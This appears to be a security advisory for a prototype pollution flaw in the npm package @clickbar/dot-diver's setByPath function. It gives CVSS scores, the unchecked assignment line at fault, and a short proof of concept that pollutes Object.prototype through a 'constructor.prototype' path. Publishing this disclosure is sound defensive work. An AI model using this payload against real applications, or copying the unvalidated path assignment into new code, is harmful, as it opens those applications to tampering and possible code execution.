GoogleOSV:GHSA-9W5F-MW3P-PJ47Prototype Pollution(PP) vulnerability in setByPath
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
68.4%
Summary
There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
In this code, there is no validation for Prototpye Pollution.
PoC
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
Impact
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
References
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
68.4%